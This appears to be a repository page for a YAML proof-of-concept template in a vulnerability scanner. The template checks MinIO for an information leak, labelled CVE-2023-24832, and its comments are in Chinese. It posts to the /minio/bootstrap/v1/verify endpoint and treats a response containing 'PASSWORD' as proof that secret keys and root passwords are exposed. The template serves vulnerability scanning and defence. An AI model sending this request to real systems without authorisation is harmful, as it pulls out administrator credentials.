Poc_Scanner/poc/CVE-Poc/CVE-2023-24832_minio.yaml
2024-10-09 15:15:50 +08:00

31 lines
819 B
YAML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

keyword: minio
name: MinIO信息泄露漏洞
description: |
在集群部署的Minio中未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD可能导致攻击者以管理员权限登录Minio。
requests: # 为空代表默认或者不启用
path: "/minio/bootstrap/v1/verify"
method: POST
headers:
User-agent:
Content-length:
Accept:
Content-type:
Accept-Encoding:
Cookie:
Referer:
X-Forwarded-For:
body-raw: |-
response:
path: ""
status-code: 200
body: "PASSWORD" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: |
泄露系统账号密码